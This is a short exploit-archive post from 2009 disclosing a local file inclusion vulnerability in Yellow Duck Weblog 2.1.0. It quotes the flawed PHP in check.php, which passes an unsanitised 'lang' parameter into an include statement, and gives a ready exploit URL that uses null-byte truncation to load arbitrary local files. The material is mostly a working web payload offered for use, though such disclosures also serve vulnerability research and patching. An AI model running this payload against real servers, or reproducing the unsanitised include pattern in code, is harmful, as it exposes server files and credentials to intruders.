[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion Vulnerability
# Published : 2009-04-13
# Author : ahmadbady
# Previous Title : X10Media Mp3 Search Engine < 1.6.2 Admin Access Vulnerability
# Next Title : XEngineSoft PMS/MGS/NM/AMS 1.0 (Auth Bypass) SQL Injection Vulns
=-=-local file include-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::Yellow Duck Weblog
-------------------------------------------------
Author: ahmadbady
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://prdownload.berlios.de/ydframework/YDWeblog-2.1.0-final.tar.gz
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /include/languages/check.php
$file = 'language_' . $_GET['lang'] . '.php'; line 9
include $file; line 20
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-
xpl:
/path/include/languages/check.php?lang=[local file]%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-
# www.Syue.com [2009-04-13]